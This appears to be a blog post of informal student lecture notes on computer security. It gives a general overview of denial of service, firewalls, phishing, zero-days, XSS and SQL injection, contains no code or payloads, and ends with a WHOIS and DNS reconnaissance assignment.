Exploits - things that can go wrong
5 years script kiddies, now its criminal activity and has really changed, over the next few
Years it’s going to change again.
The change from operating attacks to application attacks, when you have applicatios you have a lot more variables then with dealing with the os many more applications and all doing different things, OS are straight forward applicationts are dynamic.
You still have the same things the attackers will do,
What is a DoS
CIA
Confidentiality,
Keep it secret
Integrity
Information from the data is what it should be, for instance you look at your bank account and you want to know the numbers are really their.
What it should be when it should be.
Lot of do who changed it who can change it.
Identity how do you prove someone is who they are.
Accessibility
Avaliable when its needed in a timely fashion.
DoS denies accessibility
DDoS – Distributed Denial of service
One way is to break the software this is one way another common one its not through breaking the software but overloading or clogging the piped to it.
Thisi is where DDoS, BogNets one central system which controls many computers so no one can access the service
DoS the basic, it has been mostly preformed for kids in basements or unhappy employees, They have been used for extortion, if you shut down your site it can cost you 30000 dollars it can be a real problem and it has in some palces ,
Why is the web to vulnerable to risk,
When it first came out everything was open and a kind of utopian world,
John Morris, the son of a internet pioneer the son wrote a program to find how mayn users are on the internet, thousands of the them, it used the finger deamon and it would move itself on the machine and do finger searches, he forgot to do make it see if its their, it was a naïve thing, he wrote a program that invaded other peoples computers,
Firewalls – controls what gets in and out, a firewall originally, first basic fire wall did packet filtering, looks at each packet and looks at the ports what ports is it asking for suppose you have telnet inside which is port23 and you have ssh 22 and http 80 and so , suppose you want telnet internally but not externally lets say it gets stop at the fire wall if you wna the public to have access to your web server then you make them go through that only port, may port for 25 but you restrict it to the ports you want to get through,
What happened when it was in place, everyone started having a webserver, webservers would give you some documents, well the people that wrote webservers what if it can expand to dynamic content or video they made more expansive webserver and create dynamic content.
Dynamic more accessible to the public, then they explanded the firewall they had web services goes through mysql, and come up more complex and they have holes to powerful complex software, the attacks change what they do and start aiming at the dynamic attributes of the server not just HTTP, but HTTP are common cause they do so many things and because theya re complex they are perfect targets for running exploits the exploits have gotten more and more toward webbrowsers.
Embed macros, it’s a program in a program web applications become a good target
Email targets are great bc of spam
Media players complexity, YouTube.com vector to get into the system passed the firewall.
On the server side service os the OS security software becomes a target for attackers, get a couruppted version. File management servers and database software.
Also things aimed at people, user rights unauthed devices,
Phishing, your account is over due give ur password, got all the right graphics but its false,
Spear phishing when you target people, or you lap top of usb keys, wireless if a grate vector
Instant messaging, easy for all the dumbasses.
Zero Day Attack, an attack where the attackers know it can mount it before the vendors know its their, it usually happens with hacks someone finds the weakness posts it then it the software vendors will patch it.
Because we have sophisticated criminals before they use
Storm Worm,
Recognize trends
Talking about DoS
Another privileged escalation – its like a user getting root access, some users on a a system but you want to get higher.
Trying to get from out in the cloud through a couple of a server, if they see outside traffic doing into system they have logs or IDS, they can call your service, or police come knocking
They will break in further away to get closer to the machine, trying to get machines to do the work for them, this is slow so they can get privileged escalation.
Common things, two things you will see a lot of,
XSS - Cross Site Scripting
SQL Injection
Everyone is blogging, websites allow users to put stuff in, cross site scripting when you put data in a blog that will effect the behaviour of a server, thing about it like this someone goes to a site, and look at someone’s blog the big thing now is java script, Java script embeds some code in your webpage, when the browser gets the webpage it runs that code, it allows the code to run on the clients machine however evil stuff can get in it, in cross site scription when you look at a wikipage or a blog, that will not be visible by you that will be executed by ur browser.
A lot of sites and wikis check this, but if its sophisticated it will always get through,
SQL injection when a web server is sending queires to a database databases by nature have a lot of data, its in a hackers intrest to get access to this.
If you design ur self right you, you use –T cause if you web server is interactions with database server if someone slips some sql code in the stuff that gets stuff into the data server can do bad things, get access, integrity, unauthorized, find credit card numbers.
DNS poisoning put false entries, collecting data,
Identity theft,
New devices for password, MLS and email password for only 30 seconds
Assignment 1
WHOIS
GOOGLE
DNS Tools
CanadianISP.com
Take it a generate a report a .pdf file and you can upload it
No comments:
Post a Comment